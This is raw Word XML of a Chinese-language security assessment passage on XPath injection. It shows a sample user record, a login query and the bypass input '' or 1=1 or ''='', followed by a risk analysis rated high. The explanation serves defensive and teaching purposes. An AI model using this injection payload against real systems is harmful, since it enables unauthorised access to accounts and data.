          <w:p w14:paraId="252E448B"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astname&gt;Gantz&lt;/lastname&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B085778"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oginID&gt;xyz&lt;/loginID&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A1081AB"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password&gt;123test&lt;/password&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="364B4654"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tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="24A99E4C"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hint="eastAsia"/>
        </w:rPr>
        <w:t>则在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XPath</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中其典型的查询语句如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2A9165"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users/user[loginID/text()='xyz' and password/text()='123test']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E188F1E" w14:textId="79FDC6E2" w:rsidR="00F04B45" w:rsidRPr="00F43721" w:rsidRDefault="00F04B45" w:rsidP="00F43721">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但是，可以采用如下的方法实施注入攻击，绕过身份验证。如果用户传入一个</w:t>
      </w:r>
      <w:r w:rsidR="00104669" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>login</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，例如</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">loginID = 'xyz' </w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>password = '123test'</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，则该查询语句将返回</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。但如果用户传入类似</w:t>
      </w:r>
      <w:r w:rsidR="00816D98" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>'' or 1=1 or ''=''</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的值，那么该查询语句也会得到</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">true </w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回值，因为</w:t>
      </w:r>
      <w:r w:rsidR="00816D98" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XPath</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查询语句最终会变成如下代码：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3755AA"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users/user[loginID/text()='' or 1=1 or ''='' and password/text()='' or 1=1 or ''='']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F694FC8" w14:textId="0ABE840F" w:rsidR="001A7A0B" w:rsidRPr="00F43721" w:rsidRDefault="00F04B45" w:rsidP="00F43721">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个字符串会在逻辑上使查询一直返回</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">true </w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并将一直允许攻击者访问系统。攻击者可以</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>利用</w:t>
      </w:r>
      <w:r w:rsidR="000175A1" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XPath</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在应用程序中动态地操作</w:t>
      </w:r>
      <w:r w:rsidR="000175A1" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XML</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文档。攻击完成登录可以再通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XPath</w:t>
      </w:r>
      <w:r w:rsidR="000175A1" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>盲注</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>技术获取最高权限帐号和其它重要文档信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE0F3FE" w14:textId="77777777" w:rsidR="000A040A" w:rsidRPr="00F43721" w:rsidRDefault="00C24790" w:rsidP="00F43721">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="001A7A0B" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="000A040A" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">XPath </w:t>
      </w:r>
      <w:r w:rsidR="000A040A" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入攻击利用两种技术，即</w:t>
      </w:r>
      <w:r w:rsidR="000A040A" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XPath</w:t>
      </w:r>
      <w:r w:rsidR="000A040A" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>扫描和</w:t>
      </w:r>
      <w:r w:rsidR="000A040A" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XPath</w:t>
      </w:r>
      <w:r w:rsidR="000A040A" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查询布尔化。通过该攻击，攻击者可以控制用来进行</w:t>
      </w:r>
      <w:r w:rsidR="000A040A" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XPath</w:t>
      </w:r>
      <w:r w:rsidR="000A040A" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查询的</w:t>
      </w:r>
      <w:r w:rsidR="000A040A" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XML</w:t>
      </w:r>
      <w:r w:rsidR="000A040A" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库。这种攻击可以有效地对付使用</w:t>
      </w:r>
      <w:r w:rsidR="000A040A" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XPath</w:t>
      </w:r>
      <w:r w:rsidR="000A040A" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查询（和</w:t>
      </w:r>
      <w:r w:rsidR="000A040A" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XML</w:t>
      </w:r>
      <w:r w:rsidR="000A040A" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库）来执行身份验证、查找或者其它操作。</w:t>
      </w:r>
      <w:r w:rsidR="000A040A" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XPath</w:t>
      </w:r>
      <w:r w:rsidR="000A040A" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入攻击同</w:t>
      </w:r>
      <w:r w:rsidR="000A040A" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidR="000A040A" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入攻击类似，但和</w:t>
      </w:r>
      <w:r w:rsidR="000A040A" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidR="000A040A" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入攻击相比较，</w:t>
      </w:r>
      <w:r w:rsidR="000A040A" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XPath</w:t>
      </w:r>
      <w:r w:rsidR="000A040A" w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在以下方面具有优势。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FCFB9C" w14:textId="77777777" w:rsidR="000A040A" w:rsidRPr="00F43721" w:rsidRDefault="000A040A" w:rsidP="00F43721">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）广泛性。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XPath</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入攻击利用的是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XPath</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语法，由于</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XPath</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一种标准语言，因此只要是利用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XPath</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语法的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用程序如果未对输入的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XPath</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查询做严格的处理都会存在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XPath</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入漏洞，所以可能在所有的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XPath</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实现中都包含有该弱点，这和</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入攻击有很大区别。在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入攻击过程中根据数据库支持的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语言不同，注入攻击的实现可能不同。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154B40B5" w14:textId="31222FB6" w:rsidR="001A7A0B" w:rsidRPr="00F43721" w:rsidRDefault="000A040A" w:rsidP="00F43721">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）危害性大。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XPath</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语言几乎可以引用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XML</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文档的所有部分，而这样的引用一般没有访问控制限制。但在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入攻击中，一个“用户”的权限可能被</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>限制到某一特定的表、列或者查询，而</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XPath</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入攻击可以保证得到完整的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XML</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文档，即完整的数据库。只要</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务应用具有基本的安全漏洞，即可构造针对</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XPath</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用的自动攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FE23F1" w14:textId="77777777" w:rsidR="001A7A0B" w:rsidRPr="00F43721" w:rsidRDefault="001A7A0B" w:rsidP="00F43721">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB59343" w14:textId="3A5E44A0" w:rsidR="001A7A0B" w:rsidRPr="00F43721" w:rsidRDefault="00E83B54" w:rsidP="00F43721">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>高危</w:t>
      </w:r>
      <w:r w:rsidRPr="00F43721">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
